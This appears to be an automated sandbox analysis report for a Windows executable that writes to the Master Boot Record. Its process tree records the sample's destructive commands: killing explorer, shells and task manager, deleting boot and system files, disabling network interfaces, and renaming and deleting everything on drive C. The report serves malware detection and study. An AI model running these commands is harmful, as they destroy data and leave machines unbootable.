Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
22-01-2023 12:35
Behavioral task
behavioral1
Sample
ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe
Resource
win10v2004-20221111-en
General
-
Target
ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe
-
Size
537KB
-
MD5
99ae89d49036c0e2f934339510c68bea
-
SHA1
b05fe3112ff3b29aca6b510cb093094ad10011d4
-
SHA256
ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061
-
SHA512
7a6c48ab4a1894a6712bc337d356f984a38e18f4005bd259a016f9bf634eff92f349f61f49aa0990d579bb50c423930700a6a2874371160f8664cc56a35580a7
-
SSDEEP
6144:4gWnATR10e5cDOT4cFxWdkGjZJi8mImDGHGaLtKXuRth1M+H:Cq10/DOT4ce3j7DDKXuRthG+
Malware Config
Signatures
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe -
Kills process with taskkill 6 IoCs
pid Process 1740 taskkill.exe 520 taskkill.exe 668 taskkill.exe 1164 taskkill.exe 1340 taskkill.exe 1080 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 668 taskkill.exe Token: SeDebugPrivilege 1164 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1080 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1248 wrote to memory of 944 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 29 PID 1248 wrote to memory of 944 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 29 PID 1248 wrote to memory of 944 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 29 PID 1248 wrote to memory of 944 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 29 PID 944 wrote to memory of 520 944 cmd.exe 30 PID 944 wrote to memory of 520 944 cmd.exe 30 PID 944 wrote to memory of 520 944 cmd.exe 30 PID 944 wrote to memory of 520 944 cmd.exe 30 PID 1248 wrote to memory of 1600 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 32 PID 1248 wrote to memory of 1600 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 32 PID 1248 wrote to memory of 1600 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 32 PID 1248 wrote to memory of 1600 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 32 PID 1600 wrote to memory of 668 1600 cmd.exe 33 PID 1600 wrote to memory of 668 1600 cmd.exe 33 PID 1600 wrote to memory of 668 1600 cmd.exe 33 PID 1600 wrote to memory of 668 1600 cmd.exe 33 PID 1248 wrote to memory of 536 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 34 PID 1248 wrote to memory of 536 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 34 PID 1248 wrote to memory of 536 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 34 PID 1248 wrote to memory of 536 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 34 PID 536 wrote to memory of 1164 536 cmd.exe 35 PID 536 wrote to memory of 1164 536 cmd.exe 35 PID 536 wrote to memory of 1164 536 cmd.exe 35 PID 536 wrote to memory of 1164 536 cmd.exe 35 PID 1248 wrote to memory of 704 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 36 PID 1248 wrote to memory of 704 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 36 PID 1248 wrote to memory of 704 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 36 PID 1248 wrote to memory of 704 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 36 PID 704 wrote to memory of 1340 704 cmd.exe 37 PID 704 wrote to memory of 1340 704 cmd.exe 37 PID 704 wrote to memory of 1340 704 cmd.exe 37 PID 704 wrote to memory of 1340 704 cmd.exe 37 PID 1248 wrote to memory of 544 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 38 PID 1248 wrote to memory of 544 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 38 PID 1248 wrote to memory of 544 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 38 PID 1248 wrote to memory of 544 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 38 PID 544 wrote to memory of 1080 544 cmd.exe 39 PID 544 wrote to memory of 1080 544 cmd.exe 39 PID 544 wrote to memory of 1080 544 cmd.exe 39 PID 544 wrote to memory of 1080 544 cmd.exe 39 PID 1248 wrote to memory of 2028 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 40 PID 1248 wrote to memory of 2028 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 40 PID 1248 wrote to memory of 2028 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 40 PID 1248 wrote to memory of 2028 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 40 PID 2028 wrote to memory of 1740 2028 cmd.exe 41 PID 2028 wrote to memory of 1740 2028 cmd.exe 41 PID 2028 wrote to memory of 1740 2028 cmd.exe 41 PID 2028 wrote to memory of 1740 2028 cmd.exe 41 PID 1248 wrote to memory of 1932 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 42 PID 1248 wrote to memory of 1932 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 42 PID 1248 wrote to memory of 1932 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 42 PID 1248 wrote to memory of 1932 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 42 PID 1932 wrote to memory of 564 1932 cmd.exe 43 PID 1932 wrote to memory of 564 1932 cmd.exe 43 PID 1932 wrote to memory of 564 1932 cmd.exe 43 PID 1932 wrote to memory of 564 1932 cmd.exe 43 PID 1248 wrote to memory of 876 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 44 PID 1248 wrote to memory of 876 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 44 PID 1248 wrote to memory of 876 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 44 PID 1248 wrote to memory of 876 1248 ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe 44 PID 876 wrote to memory of 1160 876 cmd.exe 45 PID 876 wrote to memory of 1160 876 cmd.exe 45 PID 876 wrote to memory of 1160 876 cmd.exe 45 PID 876 wrote to memory of 1160 876 cmd.exe 45 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 1160 attrib.exe 1756 attrib.exe 896 attrib.exe 2000 attrib.exe 564 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe"C:\Users\Admin\AppData\Local\Temp\ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'explorer.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'explorer.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'cmd.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'cmd.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'powershell.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'powershell.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'powershell_ise.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'powershell_ise.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'studentmain.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'studentmain.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill -f -im 'taskmgr.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im 'taskmgr.exe'3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -S -H C:\bootmgr2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\attrib.exeattrib -S -H C:\bootmgr3⤵
- Views/modifies file attributes
PID:564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -S -H C:\boot.ini2⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\attrib.exeattrib -S -H C:\boot.ini3⤵
- Views/modifies file attributes
PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -S -H C:\ntldr2⤵PID:1752
-
C:\Windows\SysWOW64\attrib.exeattrib -S -H C:\ntldr3⤵
- Views/modifies file attributes
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -S -H C:\Autoexec.bat2⤵PID:1012
-
C:\Windows\SysWOW64\attrib.exeattrib -S -H C:\Autoexec.bat3⤵
- Views/modifies file attributes
PID:896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\Autoexec.bat2⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\windows\win.ini2⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\windows\system.ini2⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -S -H C:\config.sys2⤵PID:1608
-
C:\Windows\SysWOW64\attrib.exeattrib -S -H C:\config.sys3⤵
- Views/modifies file attributes
PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\config.sys2⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\ntldr2⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\boot.ini2⤵PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\bootmgr2⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface set interface '±¾µØÁ¬½Ó' disabled2⤵PID:1972
-
C:\Windows\SysWOW64\netsh.exenetsh interface set interface '±¾µØÁ¬½Ó' disabled3⤵PID:868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface set interface 'WLAN' disabled2⤵PID:268
-
C:\Windows\SysWOW64\netsh.exenetsh interface set interface 'WLAN' disabled3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ren C:\*.* *.taierzhuang2⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del -f -s -q C:\*.*2⤵PID:1156
-